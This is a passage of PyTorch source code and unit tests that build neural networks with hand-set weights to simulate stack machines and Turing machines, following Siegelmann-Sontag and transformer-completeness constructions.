# linear next substack
w = torch.zeros(4*p, p)
b = torch.zeros(4*p,)
for i in range(p):
# noop
j = 0
w[4*i+j, i] = 1
b[4*i+j] = 0
# push0
j = 1
w[4*i+j, i] = 1/(10*p**2)
b[4*i+j] = (10*p**2-4*p-1)/(10*p**2)
# push1
j = 2
w[4*i+j, i] = 1/(10*p**2)
b[4*i+j] = (10*p**2-1)/(10*p**2)
# pop
j = 3
w[4*i+j, i] = 10*p**2
b[4*i+j] = -10*p**2+4*p+1
linear = Linear(4*p, p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.next_sub_stack = linear
# linear next subtop
w = torch.zeros(4*p, p)
for i in range(p):
j = 3
w[4*i+j, i] = -4
linear = Linear(4*p, p, bias=False)
linear.weight = Parameter(w)
self.next_sub_top = linear
# linear_st; eq (25)
w = (2*p+1)*10*p**2 * torch.eye(4*p)
b = -(2*p+1)*(10*p**2-2) * torch.ones(4*p,)
linear = Linear(4*p, 4*p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_st = linear
# linear_sn; eq (26)
w = 10*p**2 * torch.eye(4*p)
b = -(10*p**2-4*p-2) * torch.ones(4*p,)
linear = Linear(4*p, 4*p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_sn = linear
def forward(self, x: Tensor):
s, p = self.s, self.p
# current main layer
st_, subs_, subt_, subn_ = 0, s, s+4*p, s+8*p
state = x[st_:subs_]
noisy_sub_stack = x[subs_:subt_]
noisy_sub_top = x[subt_:subn_]
noisy_sub_nonempty = x[subn_:]
# hidden layer
w = torch.cat([
noisy_sub_top,
noisy_sub_nonempty,
state
])
cd_out = self.configuration_detector(w)
sub_stack = saturated_relu(noisy_sub_stack)
sub_top = saturated_relu(noisy_sub_top)
stack = self.linear_stack(sub_stack)
top = self.linear_top(sub_top)
# next main layer
next_state = self.beta(cd_out)
# eq (24)
next_noisy_sub_stack = self.next_sub_stack(stack)\
+ self.next_sub_top(top)\
+ self.gamma(cd_out) - 1
next_noisy_sub_top = self.linear_st(next_noisy_sub_stack)
next_noisy_sub_nonempty = self.linear_sn(next_noisy_sub_stack)
o = torch.cat([
next_state,
next_noisy_sub_stack,
next_noisy_sub_top,
next_noisy_sub_nonempty
])
return o
def fit(self, delta, z2i, states, alphabet, fallback_next_state_and_action=('F', 'noop', 'noop')):
"""
TODO
Create datapoints to set beta, gamma
"""
# y = self._generate_y(delta, z2i, states, alphabet, i2b, fallback_next_state_and_action)
# x = self.configuration_detector.linear.weight.detach()
# h = self.configuration_detector(x)
p, s = self.p, self.s
grid_size = len(delta)*4**p
low_value = (-8*p**2+2)
y = torch.zeros(grid_size, 4*p+s)
x = low_value * torch.ones(grid_size, 8*p+s)
row = 0
for _, ((z, top_0, top_1), (z_next, action_1, action_2)) in enumerate(delta.items()):
substack_action_indicator = torch.zeros(4*p)
for k, action in enumerate([action_1, action_2]):
offset = self.map_action(action)
substack_action_indicator[4*k+offset] = 1
d = self.noisy_sampler((top_0, top_1))
# generate various inputs corresponding to the current key
for i in self.configuration_detector.generate_i():
# we skip None cases, so this is just combinations of substack 4^p
if None in i: continue
# set x
x[row, 8*p+z2i[z]] = 1
slice = self.configuration_detector.convert_to_tensor_indices(i)
x[row, slice] = d
# set y
y[row, 4*p+z2i[z_next]] = 1
y[row, :4*p] = substack_action_indicator
row += 1
h = self.configuration_detector(x)
beta, gamma = self._solve_for_beta_and_gamma(h, y)
self.beta.weight = Parameter(beta)
self.gamma.weight = Parameter(gamma)
def _sample(self, top):
"""See range table; p. 145
"""
p = self.p
if top == 1:
return 2*p+1, 4*p+1
elif top == 0:
return -8*p**2+2, 1
elif top == None:
return -20*p**3-10*p**2+4*p+2, -10*p**2+4*p+2
def noisy_sampler(self, tops):
"""Sample d (the meaningful values?) of Lemma 6.2
See range table; p. 145
"""
# a_1, a_2, i2b[b_1], i2b[b_2]
sampled_top, sampled_nonempty = tuple(zip(*map(self._sample, tops)))
return torch.Tensor(sampled_top + sampled_nonempty)
@staticmethod
def map_action(action: str):
if action == 'push 0':
offset = 1
elif action == 'push 1':
offset = 2
elif action == 'pop':
offset = 3
else:
# noop
offset = 0
return offset
def _solve_for_beta_and_gamma(self, h, y):
"""TODO:
"""
p = self.p
U, S, Vh = torch.linalg.svd(h.detach(), full_matrices=False)
C = (Vh.T @ torch.inverse(torch.diag(S)) @ U.T @ y).T
return C[4*p:,:], C[:4*p,:]
class ConfigurationDetector1(Module):
"""TODO:
\beta(d_1^(1),...,d_t^(r)) x = \sum_{i \in I} c_i \sigma(v_i^T \mu_i)
"""
def __init__(self, s: int, p: int):
super().__init__()
# number of states
self.s = s
# number of stacks
self.p = p
w = torch.zeros(s * 9**p, 8*p+s)
b = torch.zeros(s * 9**p, )
counter = 0
for i, z in self.generate_i_z():
slice = self.convert_to_tensor_indices(i)
k = len(slice)
if k == 0:
# state weight
w[counter, 8*p+z] = 1
else:
# top, nonempty weights
w[counter, slice] = 1
# state weight
w[counter, 8*p+z] = k*(4*p+2)
# bias
b[counter] = -k*(4*p+2)
counter += 1
linear = Linear(8*p+s, s * 9**p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear = linear
def forward(self, x):
return saturated_relu(self.linear(x))
def generate_i_z(self):
for i in self.generate_i():
for z in range(self.s):
yield i, z
def generate_i(self):
"""Generate multi-index from {None, 0, 1, 2, 3}^{2p},
skip invalid multi-indices
"""
# substack indices
subs = (None, 0, 1, 2, 3)
# choose i_nonempty first
for i_nonempty in product(*self.p*[subs]):
# then get i_top
for i_top in self._generate_i_top(i_nonempty):
yield (*i_top, *i_nonempty)
def _generate_i_top(self, i_nonempty):
cands = [{None, j} for j in i_nonempty]
for j in product(*cands):
yield j
def convert_to_tensor_indices(self, i: Tuple[int]):
"""Map (i1, i2, i3, ...) to (i1, i2+4, i3+8, ...)
"""
offsets = range(0, 8*self.p, 4)
return tuple(a+b for a, b in zip(i, offsets) if a is not None)
class SiegelmannSontag4(Module):
"""Feedforward layers to
Notes
A layer used in
input x: s + p = len(states) + len(alphabet); we ignore the counter
Reference
SS95
"""
def __init__(self, s: int, p: int = 2):
super().__init__()
self.s = s
self.p = p
# F_4, linear state0
linear = Linear(s-1, s)
w = torch.zeros(s, s-1)
b = torch.zeros(s, )
# 0-state
w[0, :] = -1
b[0] = 1
w[1:, :] = torch.eye(s-1)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_state0 = linear
# F_4, linear top, zeta, a
linear = Linear(p, p)
w = 4 * torch.eye(p)
b = -2 * torch.ones(p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_top = linear
# F_4, linear nonempty, tau, b
linear = Linear(p, p)
w = 4 * torch.eye(p)
b = torch.zeros(p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_nonempty = linear
# F_3, F_2
self.configuration_detector = ConfigurationDetector4(s, p)
d = s*3**p
self.beta = Linear(d, s, bias=False)
self.gamma = Linear(d, 4*p, bias=False)
eta = s+4*p
linear = Linear(s+3*p, eta)
w = torch.zeros(eta, s+3*p)
b = torch.zeros(eta,)
# b[:s] = 1
# substacks
stack_, top_ = s+2*p, s
k = 0
for i in range(p):
w[s+k+0, stack_+i] = 1
b[s+k+0] = 0
w[s+k+1, stack_+i] = 1/4
b[s+k+1] = 1/4
w[s+k+2, stack_+i] = 1/4
b[s+k+2] = 3/4
w[s+k+3, stack_+i] = 4
w[s+k+3, top_+i] = -2
b[s+k+3] = -1
k += 4
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_update = linear
# F_1
linear = Linear(eta, s-1+p)
w = torch.zeros(s-1+p, eta)
b = torch.zeros(s-1+p,)
w[:s-1, 1:s] = torch.eye(s-1)
for i in range(p):
w[s-1+i, s+4*i:s+4*i+4] = 1
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_F_1 = linear
def forward(self, x: Tensor):
s, p = self.s, self.p
x_state, x_stack = x[:s-1], x[s-1:]
# F4
o = torch.cat([
self.linear_state0(x_state),
self.linear_top(x_stack),
self.linear_nonempty(x_stack),
x_stack])
o = saturated_relu(o)
def decode(xx: float) -> str:
# top
if xx < 1e-8:
return ''
elif 4*xx-2 > 0:
# top is 1
return '1' + decode(4*xx-2-1)
else:
# top is 0
return '0' + decode(4*xx-1)
for w in o[s+2*p:s+3*p].detach():
print(w, decode(w.item()))
# F3, F2
u = self.configuration_detector(o[:s+2*p])
# print('beta, gamma', [self.beta(u), self.gamma(u)-1])
proj = torch.cat([self.beta(u), self.gamma(u)-1])
# self.gamma(self.configuration_detector(torch.Tensor((0,1,0,0,0,1,1,1))))
# print('update', self.linear_update(o))
o = proj + self.linear_update(o)
o = saturated_relu(o)
# print(o[:s], o[s:])
# F1
o = self.linear_F_1(o)
o = saturated_relu(o)
print()
return o
def fit(self, delta, z2i, states, alphabet, fallback_next_state_and_action=('F', 'noop', 'noop')):
"""
"""
y = self._generate_y(delta, z2i, states, alphabet, fallback_next_state_and_action)
x = self.configuration_detector.linear.weight.detach()
h = self.configuration_detector(x)
beta, gamma = self._solve_for_beta_and_gamma(h, y)
self.beta.weight = Parameter(beta)
self.gamma.weight = Parameter(gamma)
def _generate_y(self, delta, z2i, states, alphabet, fallback_next_state_and_action):
p, s = self.p, self.s
d = s * 3**p
y = torch.zeros(d, s+4*p)
for row, (v, z) in enumerate(self.configuration_detector.generate_v_z()):
key = self._get_key(v, z, states)
if key not in delta:
print(f'The transition from {key} is not specified. Using fallback.')
z_next, action_1, action_2 = delta.get(key, fallback_next_state_and_action)
y[row, z2i[z_next]] = 1
for k, action in enumerate([action_1, action_2]):
offset = self.map_action(action)
y[row, s+4*k+offset] = 1
return y
@staticmethod
def map_action(action: str):
if action == 'push 0':
offset = 1
elif action == 'push 1':
offset = 2
elif action == 'pop':
offset = 3
else:
# noop
offset = 0
return offset
def _get_key(self, v, z, states):
a_1, a_2, b_1, b_2 = v
return states[z], a_1 if b_1==1 else None, a_2 if b_2==1 else None
def _solve_for_beta_and_gamma(self, h, y):
"""TODO:
y = y[batch, :]
= cd(x[batch, :]) * C
= h * C
"""
s = self.s
C = torch.linalg.solve(h, y).detach().T
return C[:s,:], C[s:,:]
class ConfigurationDetector4(Module):
"""TODO:
= -1 + \sum_{j=1}^s \beta_j(a_1,...,a_p,b_1,...,b_p) x_j
= -1 + \sum_{j=1}^s \sum_{i=1}^{3^p} c_i \sigma(v_{i}{1} a_1 + ... + v_{i}{2p} b_p + x_j - const)
= C * \sigma (L * input + bias) - 1
where
input = (x,a,b) is (s+2p) x 1
C is 1 x s*3^p
L is s*3^p x (s+2p) =
| e_1' v |
| e_2' v |
| ... |
| e_s' v |
Note
L, bias are universal, hence constant
C is independent
Unlike the paper, we use s instead of s+1 states.
"""
def __init__(self, s: int, p: int):
super().__init__()
# number of states
self.s = s
# number of stacks
self.p = p
# network
d = s*3**p
w = torch.zeros(d, s+2*p)
b = torch.zeros(d,)
counter = 0
for v, z in self.generate_v_z():
w[counter, s:] = torch.Tensor(v)
# copy state
w[counter, z] = 1
# bias
b[counter] = -sum(v)
counter += 1
linear = Linear(s+2*p, d)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear = linear
def forward(self, x):
return saturated_relu(self.linear(x))
def generate_v_z(self):
for v in self._generate_v():
for z in range(self.s):
yield v, z
def _generate_v(self):
for i in range(4**self.p):
coefs = self._get_row_of_v(i)
if coefs: yield coefs
def _get_row_of_v(self, i: int):
t = 2*self.p
coefs = tuple(map(int, f"{i:0{t}b}"))
# skip invalid case where top/peek is 1 and nonempty is 0
for i in range(self.p):
if coefs[i]==1 and coefs[i+self.p]==0:
return None
return coefs
```
#### File: test/wcm/helper.py
```python
import unittest
import torch
from turing.wcm.simulator import Simulator
class TestCase(unittest.TestCase):
def setUp(self) -> None:
self.tx = Simulator(T=17)
def assertTensorsEqual(self, expected, actual, msg=""):
if not torch.equal(expected, actual):
self.fail(f'Not equal: {msg}')
```
#### File: test/wcm/test_decoder.py
```python
import random
import torch
from test.wcm.helper import TestCase
from turing.wcm.networks import Transition, FullAdder, PreprocessForAdder
class TestDecoder(TestCase):
def test_decode_step(self):
tx = self.tx
l = 4
for i in random.choices(range(tx.T), k=20):
for (z, a), (z_next, u, q) in tx.delta.items():
o = Transition(tx.slices, tx.delta, tx.states, tx.alphabet, tx.z2i, tx.a2i)(tx.h(z, a, i, l))
o = PreprocessForAdder(tx.slices)(o)
for k in range(tx.w_pos-1, -1, -1):
o = FullAdder(d_in=tx.w+tx.w_pos, i=tx.pos3_+k, j=tx.w+k, k=tx.scr5_)(o)
self.assertTensorsEqual(tx.one_states(z_next), o[tx.st_:tx.sym1_], "st")
self.assertTensorsEqual(torch.zeros_like(o[tx.sym1_:tx.sym2_]), o[tx.sym1_:tx.sym2_], "sym1")
self.assertTensorsEqual(tx.one_alphabet(u), o[tx.sym2_:tx.pos1_], "sym2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(i)), o[tx.pos1_:tx.pos2_], "pos1")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l)), o[tx.pos2_:tx.pos3_], "pos2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l+q)), o[tx.pos3_:tx.scr1_], "pos3")
self.assertTensorsEqual(torch.Tensor([0, 1]) if q == 1 else torch.Tensor([1, 0]), o[tx.scr5_:tx.w], "scr5")
```
#### File: test/wcm/test_get_initial_symbol.py
```python
import random
import torch
from test.wcm.helper import TestCase
from turing.wcm.networks import GetInitialSymbol
class TestCrossAttention(TestCase):
def test_single_layer(self):
"""Claim C.7
"""
tx = self.tx
tape = "B(())E"
z = random.choice(tx.states)
u = random.choice(tx.alphabet)
i = random.choice(range(tx.T))
l_minus = random.choice(range(len(tape)))
l = random.choice(range(len(tape)))
iprime = 2
uprime = random.choice(tx.alphabet)
m = len(tape)
xl = tape[l]
f = GetInitialSymbol(tx.slices)
x, E = self.generate_input(tape, z, u, i, l_minus, l, iprime, uprime)
o = f(x, E)
o = o[-1, :]
self.assertTensorsEqual(tx.one_states(z), o[tx.st_:tx.sym1_], "st")
self.assertTensorsEqual(tx.one_alphabet(u), o[tx.sym2_:tx.pos1_], "sym2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(i)), o[tx.pos1_:tx.pos2_], "pos1")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l_minus)), o[tx.pos2_:tx.pos3_], "pos2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l)), o[tx.pos3_:tx.scr1_], "pos3")
if iprime == 0:
self.assertTensorsEqual(torch.zeros_like(o[tx.scr1_:tx.scr2_]), o[tx.scr1_:tx.scr2_], "scr1")
else:
self.assertTensorsEqual(tx.one_alphabet(uprime), o[tx.scr1_:tx.scr2_], "scr1")
if l > m:
self.assertTensorsEqual(torch.zeros_like(o[tx.scr2_:tx.scr3_]), o[tx.scr2_:tx.scr3_], "scr2")
else:
self.assertTensorsEqual(tx.one_alphabet(xl), o[tx.scr2_:tx.scr3_], "scr2")
if iprime == 0:
self.assertTensorsEqual(torch.tensor(0.), o[tx.scr4_], "scr4_1")
else:
self.assertTensorsEqual(torch.tensor(1.), o[tx.scr4_], "scr4_1")
if l > m:
self.assertTensorsEqual(torch.tensor(0.), o[tx.scr4_+1], "scr4_2")
else:
self.assertTensorsEqual(torch.tensor(1.), o[tx.scr4_+1], "scr4_2")
def generate_input(self, tape, z, u, i, l_minus, l, iprime, uprime):
tx = self.tx
# Encoder
E = tx.encode_tape(tape)
# Decoder input
x = torch.zeros(tx.w, )
x[tx.st_:tx.sym1_] = tx.one_states(z)
x[tx.sym2_:tx.pos1_] = tx.one_alphabet(u)
x[tx.pos1_:tx.pos2_] = torch.Tensor(tx.Bin(i))
x[tx.pos2_:tx.pos3_] = torch.Tensor(tx.Bin(l_minus))
x[tx.pos3_:tx.scr1_] = torch.Tensor(tx.Bin(l))
if iprime == 0:
x[tx.scr1_:tx.scr2_] = 0
x[tx.scr4_] = 0
else:
x[tx.scr1_:tx.scr2_] = tx.one_alphabet(uprime)
x[tx.scr4_] = 1
x = x.unsqueeze(0)
return x, E
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.